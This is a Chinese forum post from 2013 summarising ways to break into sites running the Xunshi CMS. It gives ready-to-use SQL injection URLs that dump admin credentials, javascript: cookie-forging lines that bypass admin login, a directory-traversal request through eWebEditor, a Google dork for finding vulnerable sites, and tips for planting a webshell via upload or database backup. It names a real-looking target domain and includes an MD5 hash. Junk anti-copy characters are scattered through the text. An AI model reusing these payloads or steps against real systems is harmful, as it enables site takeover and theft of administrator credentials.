找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2533|回复: 0
打印 上一主题 下一主题

讯时漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-16 21:25:50 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
by:血封忆尘1 I" I4 @* n9 r! ?2 k! h

) W* w' W8 K" e" Q3 H9 n在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)$ G9 K1 z( A" t9 O  F) T8 u

9 s9 r$ |9 N7 C" _( ?+ e以下本文总结来自黑防去年第9期杂志上的内容...
* |0 n: I8 @9 Z
6 }* a+ Q4 O; h先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%
# A1 D& X- X, g8 E4 H0 k% X/ ^6 `# T/ P, k7 g( n$ u: q( {; B
26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
+ ?& w/ x+ D4 I: f0 X& ~, J
7 p# G/ S0 o# R& \8 ?, i" I, |记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况
; W6 F6 W( e* C' S3 P( Z这里一个注入
+ u9 v$ Y( M( n* z
4 q7 o, m- ?( x9 Y效果如图:5 j- B' H$ @) H8 \7 w# X
) \7 Y9 d0 Q+ \1 v! I7 [" G) G" b
. P! A5 k* @# m, @' v

0 J. J. Q* ?0 O: ~  ]这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.$ k* W; }7 D. x  ]. O

9 ]1 R2 h6 n  V" \5 [, N密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去
4 ]- d7 ^1 ~6 U- e; _$ ^" [0 w6 u
javascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));7 G, g5 g- g* G

: Q( D/ Y+ t. j9 U* Q3 V4 U& b" {- r那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:- y8 {1 f  s6 M: g
; T" x0 @2 X. i
因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞2 s' |1 P' Q1 p! a7 v; l/ y5 a
1 E8 ^9 ?9 F7 k7 u, S8 ^$ K& z; Q; N- [  l
它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以
, R  y, a; q' @% O+ x% f1 b2 P6 _: |9 B8 P6 ]9 N
访问这页面来列目录..步骤如下:
6 T6 \$ \9 d: e# a0 n$ ?6 U2 h
. K: J, ]# |$ M8 Z" A1 a: m1 Ejavascript:alert(document.cookie="admindj=1") 7 B$ X1 d: q- |1 W0 C" F
+ L' I# j& W' Z" w
http://www.political-security.co ... asp?id=46&dir=../..: |) k2 Z7 @. _& H& u' @2 c
# m" e/ h' w0 C# e! l  X5 a/ F
效果如图:; V8 u1 E) W0 V7 a% m

3 i4 b8 D: ^; A8 X: Y% g
0 g6 [& N2 X; U, P0 n; z; ?& P7 N0 o- B2 ^+ Z8 Q4 z
这样全站目录都能瞧了..找到后台目录..进去..
3 t3 S/ ^& M( ^/ ]( F& |: O) {
. U" N" I' l& e# Z1 H/ s那么进了后台怎么拿shell??上传--备份就ok了..0 L6 _/ D9 v8 a

* ]% |8 ]) l( j那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..
1 G  ]4 X6 j- e( m. ]3 @- |8 ^4 ]$ _+ o
这个我也碰到过一次..你都可以通过列目录来实现..
- R7 K' o( |, J
8 F0 H3 c( }9 _javascript:alert(document.cookie="admindj=1")
# W, H: m9 u/ b* R  J5 @! @2 F6 Y
5 C- H: P: S: M% |! ?& Yhttp://www.political-security.co ... p?action=BackupData
( |! p1 H) v1 v3 w) d6 l% y. {. ]8 ]4 \8 i3 ]5 K  T8 e
备份ok..# B. M, x( _4 M2 y1 v- ]9 {
" F- h, r2 Q8 X3 G
那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?+ B9 a/ b* Z4 I  [& y/ `! G% _

/ X5 N$ T0 g* f8 Y3 U6 \在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下
" C" j  o6 d, B" f7 ~3 |2 D+ E+ i7 D2 T- J
然后访问此页面进行注入..步骤如下:
& a/ j! `7 |6 q9 y6 e) O% d( ?7 g3 }+ E
javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")# [" r3 t* q' n" i
7 ^. C( ~+ x# S* g
然后请求admin/admin_chk.asp页面/ O( X+ G8 b$ e

2 m. f# @' G" `. X输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%
7 d0 G( ^( w( |2 Q/ W
6 ?: z" |) R, p$ D* K" j; `8 k; O' }26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin$ e7 f# O/ {5 X0 e" x8 R: d6 ~
4 ~" x$ G% p8 m- c, c* T* J. ^
效果如图所示:. E* |9 W" A2 w/ H: |1 F* g" }

5 z4 l' L* p# g# X4 e# o
; `7 u0 k8 P/ H3 d, |1 u
  {+ ?1 }; k) A; m. K8 ~2 L/ d" U讯时漏洞2
' l: J3 F- B7 i7 tgoogle关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)( ]1 l+ ], D7 r

0 Q' e/ w* {4 a+ |* [1、/admin/admin_news_pl_view.asp?id=1+ e8 Y# H# m  w! ]# ]6 ~- l6 M' M0 Y
//id任意 填入以下语句
: a+ ^& i  T2 f4 f( n3 g  {$ V
2 z9 k+ t/ ?, G, d2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!
/ z9 |: B& p+ h' W 2 n, Z6 F# W- L$ h2 j4 {

6 ^* }/ N6 a$ D" `8 f/ e( A
4 i" M7 Q1 {, D6 W" o9 a# a3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='
7 X1 s! Z2 M- H% |
& Q- M# O; z! A$ e6 b
" R) o9 H* Z2 R7 s( G! a7 Z" T8 v; S1 Y$ K6 A
; i, Y4 ?; Q8 G爆出管理员帐号和密码了3 v# R6 @& e5 ?  D

* r3 p( w  a( l, g  O+ @3 _
/ A" g' ]( l9 ~( Y+ I
- C. C$ |: v) u8 v4 w8 k/ T5 H4、cookies进后台
  x! t" }2 N. y% ]8 n
% K  [; d7 a6 ?; ^javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));1 L3 b5 y+ y3 ~) w( L5 P7 i# L+ s

4 i' ~6 h0 B" J7 }5 l$ O! k- j+ Q. T3 M

# F0 D1 O  K, K! s' E5、后台用了cookie验证,直接访问http://www.political-security.com/admin/admin_index.asp就OK了!
1 Y! M4 X% O% ~2 y* k9 q
/ p! v: H# O0 Q- Z" T; ]# n2 o6 h1 {0 n6 Q& o2 j
1 O# E& |! D! X) [( f$ D
6、后台有上传和备份取SHELL不难。" m% U3 Y9 K4 R: t; z5 z
4 v1 \& G1 \$ a6 p. t
7、讯时还有个列目录漏洞:http://www.political-security.co ... asp?id=46&dir=../..
( e* Z; e9 h4 l- [) S ( a5 {2 w1 Q$ h) A
逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!% O' Y/ \1 b6 @, l6 y" V: S

* U% f- Q0 @( }2 c1 a0 K0 o2 @3 _6 T! R- {4 Q( m/ U

; V8 |0 E! h7 U  c
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表